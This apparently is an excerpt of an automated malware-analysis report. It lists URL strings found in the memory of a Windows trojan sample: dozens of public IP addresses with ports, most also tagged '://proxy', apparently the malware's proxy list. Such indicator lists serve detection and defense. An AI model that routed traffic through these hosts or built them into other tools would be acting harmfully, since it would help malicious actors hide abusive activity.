                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C839A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.95.20.138:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://188.95.20.138:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.10.103.98:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.10.103.98:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.151.86.170:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.151.86.170:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.161.3.231:10101
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.161.3.231:10101://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6948000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.201.191.75:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.201.191.75:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.202.188.149
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.202.188.149://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.163:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.163:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1F8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.164:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC207000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.164:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.166:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.166:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.168:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.168:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.169:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6577000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.169:9090://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.171:9090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.240.60.171:9090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.250.135.40
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.250.135.40://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.250.135.40:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.29.143.202:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.29.143.202:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.50.111.164:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.50.111.164:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C675D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.84.125.189:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C675D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.84.125.189:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.90.249.80:8090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.90.249.80:8090://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.90.255.208:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://189.90.255.208:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.0.22.38:61155
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.0.22.38:61155://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.177.131
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.177.131://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.177.131:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.61.254:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.103.61.254:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.213.175:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.213.175:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.26.227:33638
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.104.26.227:33638://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.178.44:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.178.44:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.10:33633
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.10:33633://proxyP
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.10:33633x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.17:33633
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.109.72.17:33633://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.99.189:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.110.99.189:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C646E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.111.209.207:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C646E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.111.209.207:3128://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.112.39.241:5555
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.112.39.241:5555://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.40.202:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.113.40.202:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.114.245.122:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.114.245.122:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.116.2.52:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.12.58.2:1001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.12.58.2:1001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.249.180:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.249.180:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.249.6:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.249.6:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.254.233:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.120.254.233:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.121.143.129:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.121.143.129:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.228.182
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.228.182://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.241.102
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.241.102://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.128.241.102:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.136.50.67:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.136.50.67:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.155.198:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.155.198:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.215.130:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.215.130:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.224.244:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.224.244:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.229.242:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.229.242:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.14.229.242:5678x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.144.238.66:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.144.238.66:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C690C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.1.121:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C690C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.1.121:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.1.121:999x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.237.103
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.237.103://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.186.237.103:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.187.201.26:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.187.201.26:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.188.244.84:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.188.244.84:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.19.114.104:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.19.114.104:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.195.225.34
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.195.225.34://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.195.225.34:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.115.33:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.115.33:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.210.114:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.210.114:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.211.146:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.211.146:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7724000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C780F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.212.94:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C791F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.2.212.94:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.202.111.202:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.202.111.202:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.202.60.89
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.202.60.89://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.202.60.89://proxy0
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.202.60.89:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB085000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.250.131:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.211.250.131:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C782D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.216.234.186:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://190.216.234.186:999://proxy
